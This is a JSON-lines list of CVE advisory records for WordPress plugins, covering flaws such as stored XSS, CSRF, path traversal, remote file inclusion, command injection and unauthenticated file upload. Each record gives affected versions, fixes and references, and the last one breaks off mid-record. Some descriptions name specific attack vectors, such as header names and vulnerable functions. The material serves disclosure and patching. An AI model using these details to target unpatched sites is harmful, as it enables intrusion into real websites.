{"CVE_ID":"CVE-2020-36667","slug":"backup","versionEndExcluding":"1.4.1","description":"The JetBackup \u2013 WP Backup, Migrate & Restore plugin for WordPress is vulnerable to unauthorized back-up location changes in versions up to, and including 1.4.1 due to a lack of proper capability checking on the backup_guard_cloud_dropbox, backup_guard_cloud_gdrive, and backup_guard_cloud_oneDrive functions. This makes it possible for authenticated attackers, with minimal permissions, such as a subscriber to change to location of back-ups and potentially steal sensitive information from them.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59532447-1d74-4d34-85f5-d89b65a001d8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59532447-1d74-4d34-85f5-d89b65a001d8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7811","slug":"streamweasels-youtube-integration","versionImpact":"1.4.0","versionEndExcluding":"1.4.1","description":"The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'data-uuid' attribute in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-youtube-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-youtube-public.js#L874\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-youtube-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-youtube-public.js#L874\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335284#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335284#file11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb6783b4-f7a5-4f8f-a8d0-5f5c7f91f687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb6783b4-f7a5-4f8f-a8d0-5f5c7f91f687?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-33928","slug":"wp-migration-duplicator","versionImpact":"1.4.0","versionEndExcluding":"1.4.1","description":"Missing Authorization vulnerability in WebToffee WordPress Backup & Migration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Backup & Migration: from n\/a through 1.4.0.","recommendation":"Update to version 1.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0419","slug":"shortcode-for-font-awesome","versionEndExcluding":"1.4.1","description":"The Shortcode for Font Awesome WordPress plugin before 1.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ccfee43-920d-4613-b976-2ea8966696ba\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ccfee43-920d-4613-b976-2ea8966696ba\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5942","slug":"media-list","versionImpact":"1.4.0","versionEndExcluding":"1.4.1","description":"The Medialist WordPress plugin before 1.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/914559e1-eed5-4a69-8371-a48055835453\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/914559e1-eed5-4a69-8371-a48055835453\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36669","slug":"backup","versionEndExcluding":"1.4.0","description":"The JetBackup \u2013 WP Backup, Migrate & Restore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.3.9. This is due to missing nonce validation on the backup_guard_get_import_backup() function. This makes it possible for unauthenticated attackers to upload arbitrary files to the vulnerable site's server via a forged request, granted they can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2341420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2341420\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae8de00-ba4c-48d2-a566-13dac0bc4312\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae8de00-ba4c-48d2-a566-13dac0bc4312\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7002","slug":"backup-backup","versionImpact":"1.3.9","versionEndExcluding":"1.4.0","description":"The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9  via the 'url' parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc49db10-988d-42bd-a9cf-9a86f4c79568?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc49db10-988d-42bd-a9cf-9a86f4c79568?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1518\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1518\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1503\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/ajax.php#L1503\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.linuxquestions.org\\\/questions\\\/linux-security-4\\\/php-function-exec-enabled-how-big-issue-4175508082\\\/\",\"name\":\"https:\\\/\\\/www.linuxquestions.org\\\/questions\\\/linux-security-4\\\/php-function-exec-enabled-how-big-issue-4175508082\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6972","slug":"backup-backup","versionImpact":"1.3.9","versionEndExcluding":"1.4.0","description":"The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the 'content-backups' and 'content-name', 'content-manifest', or 'content-bmitmp' and 'content-identy' HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a3ae696-f67d-4ed2-b307-d2f36b6f188c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a3ae696-f67d-4ed2-b307-d2f36b6f188c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/bypasser.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/bypasser.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6971","slug":"backup-backup","versionImpact":"1.3.9","versionEndExcluding":"1.4.0","description":"The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380283c-0dbb-4d67-9f66-cb7c400c0427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380283c-0dbb-4d67-9f66-cb7c400c0427?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.9\\\/includes\\\/backup-heart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012745\\\/backup-backup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1993","slug":"icon-widget","versionImpact":"1.3.0","versionEndExcluding":"1.4.0","description":"The Icon Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7352ab6d-b582-4512-a9fa-4b42b78fa862?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7352ab6d-b582-4512-a9fa-4b42b78fa862?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icon-widget\\\/trunk\\\/src\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icon-widget\\\/trunk\\\/src\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068501\\\/#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068501\\\/#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0495","slug":"ht-slider-for-elementor","versionEndExcluding":"1.4.0","description":"The HT Slider For Elementor WordPress plugin before 1.4.0 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e3af480-b1a4-404c-b0fc-2b7b6a6b9c27\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e3af480-b1a4-404c-b0fc-2b7b6a6b9c27\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7236","slug":"backup-bolt","versionImpact":"1.3.0","versionEndExcluding":"1.4.0","description":"The Backup Bolt WordPress plugin through 1.3.0 is vulnerable to Information Exposure via the unprotected access of debug logs. This makes it possible for unauthenticated attackers to retrieve the debug log which may contain information like system errors which could contain sensitive information.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a4557e2-b764-4678-a6d6-af39dd1ba76b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a4557e2-b764-4678-a6d6-af39dd1ba76b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0559","slug":"gs-envato-portfolio","versionEndExcluding":"1.4.0","description":"The GS Portfolio for Envato WordPress plugin before 1.4.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5549261-66e2-4a5e-8781-bc555b629ccc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5549261-66e2-4a5e-8781-bc555b629ccc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1119","slug":"order-tip-woo","versionImpact":"1.3.1","versionEndExcluding":"1.4.0","description":"The Order Tip for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_tips_to_csv() function in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to export the plugin's order fees.","recommendation":"Update to version 1.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/admin\\\/controllers\\\/reports.class.php#L359\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tip-woo\\\/trunk\\\/admin\\\/controllers\\\/reports.class.php#L359\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4625","slug":"login-logout-menu","versionEndExcluding":"1.4.0","description":"The Login Logout Menu WordPress plugin before 1.4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd6657d5-810c-4d0c-8bbf-1f8d4a2d8d15\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd6657d5-810c-4d0c-8bbf-1f8d4a2d8d15\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5882","slug":"ultimate-classified-listings","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Ultimate Classified Listings WordPress plugin before 1.3 does not validate the `ucl_page` and `layout` parameters allowing unauthenticated users to access PHP files on the server from the listings page","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e8d7808-8f3e-4fc9-a1e7-e108da031ca7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e8d7808-8f3e-4fc9-a1e7-e108da031ca7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6529","slug":"ultimate-classified-listings","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Ultimate Classified Listings WordPress plugin before 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a346c9a-cc1a-46b1-b27a-a77a38449933\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a346c9a-cc1a-46b1-b27a-a77a38449933\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10137","slug":"website-contact-form-with-file-upload","versionImpact":"1.3.4","versionEndExcluding":"1.4","description":"The Website Contact Form With File Upload plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload_file()' function in versions up to, and including, 1.3.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131413\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131413\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131514\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131514\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-contact-form-with-file-upload\\\/trunk\\\/readme.txt#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-n-media-website-contact-form-with-file-upload-arbitrary-file-upload-1-3-4\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-n-media-website-contact-form-with-file-upload-arbitrary-file-upload-1-3-4\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\/04\\\/12\\\/wordpress-n-media-website-contact-form-shell-upload\\\/\",\"name\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\/04\\\/12\\\/wordpress-n-media-website-contact-form-shell-upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8395e0c4-3feb-4551-9f2f-7b80cd187eca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8395e0c4-3feb-4551-9f2f-7b80cd187eca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1627","slug":"qi-blocks","versionImpact":"1.3.6","versionEndExcluding":"1.4","description":"The Qi Blocks WordPress plugin before 1.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2292b-1ea7-4d63-ad65-0366e2c05dd3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2292b-1ea7-4d63-ad65-0366e2c05dd3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1626","slug":"qi-blocks","versionImpact":"1.3.6","versionEndExcluding":"1.4","description":"The Qi Blocks WordPress plugin before 1.4 does not validate and escape some of its Countdown block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00d86f1-7ff9-4001-af16-989358d811a8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00d86f1-7ff9-4001-af16-989358d811a8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1625","slug":"qi-blocks","versionImpact":"1.3.6","versionEndExcluding":"1.4","description":"The Qi Blocks WordPress plugin before 1.4 does not validate and escape some of its Counter block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/288208c4-e9ca-4b79-88e7-fb415a726fce\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/288208c4-e9ca-4b79-88e7-fb415a726fce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13575","slug":"web-stories-enhancer","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Web Stories Enhancer \u2013 Level Up Your Web Stories plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'web_stories_enhancer' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web-stories-enhancer\\\/trunk\\\/includes\\\/shortcode.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web-stories-enhancer\\\/trunk\\\/includes\\\/shortcode.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238312%40web-stories-enhancer&new=3238312%40web-stories-enhancer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238312%40web-stories-enhancer&new=3238312%40web-stories-enhancer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc614f2-37a6-474a-828a-1f34f98715c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc614f2-37a6-474a-828a-1f34f98715c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8479","slug":"simple-spoiler","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The The Simple Spoiler plugin for WordPress is vulnerable to arbitrary shortcode execution in versions 1.2 to 1.3. This is due to the plugin adding the filter add_filter('comment_text', 'do_shortcode'); which will run all shortcodes in comments. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ffc76d8-b841-4c26-bbc6-1f96664efe36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ffc76d8-b841-4c26-bbc6-1f96664efe36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-spoiler\\\/trunk\\\/simple-spoiler.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-spoiler\\\/trunk\\\/simple-spoiler.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151179%40simple-spoiler&new=3151179%40simple-spoiler&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151179%40simple-spoiler&new=3151179%40simple-spoiler&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8737","slug":"pdf-thumbnail-generator","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The PDF Thumbnail Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b183587b-95bd-4e82-bfc7-db5a8fbd58f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b183587b-95bd-4e82-bfc7-db5a8fbd58f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-thumbnail-generator\\\/tags\\\/1.3\\\/pdf-thumbnail-generator.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-thumbnail-generator\\\/tags\\\/1.3\\\/pdf-thumbnail-generator.php#L184\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151055\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151055\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5667","slug":"tabs-pro","versionImpact":"1.3","versionEndExcluding":"1.4","description":"The Tab Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4, or a newer patched 